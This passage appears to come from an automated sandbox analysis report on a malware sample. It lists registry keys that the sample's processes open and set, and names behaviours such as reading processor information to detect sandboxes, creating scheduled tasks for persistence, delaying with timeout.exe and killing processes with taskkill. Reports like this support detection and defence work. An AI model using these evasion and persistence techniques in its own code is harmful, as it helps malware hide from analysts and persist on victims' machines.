\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A89A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BCD0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BCD0.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
5.exe9357.tmp.exe8D7C.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9357.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9357.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8D7C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8D7C.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 5256 schtasks.exe 2820 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 4188 timeout.exe 5688 timeout.exe 3088 timeout.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 4172 taskkill.exe 5776 taskkill.exe 5768 taskkill.exe -
Modifies Control Panel 1 IoCs
Processes:
MicrosoftEdge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Colors MicrosoftEdge.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exesvchost.exenetsh.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\MY svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" csrss.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a7598dd4f501d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000ae746e9eb878e3d98058b848fbf44d27d66b401e4c237f05dda8f01e2b14c38a36dec66d235c7a246e4e9327975033ccbb09e1b505daa8371789 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" 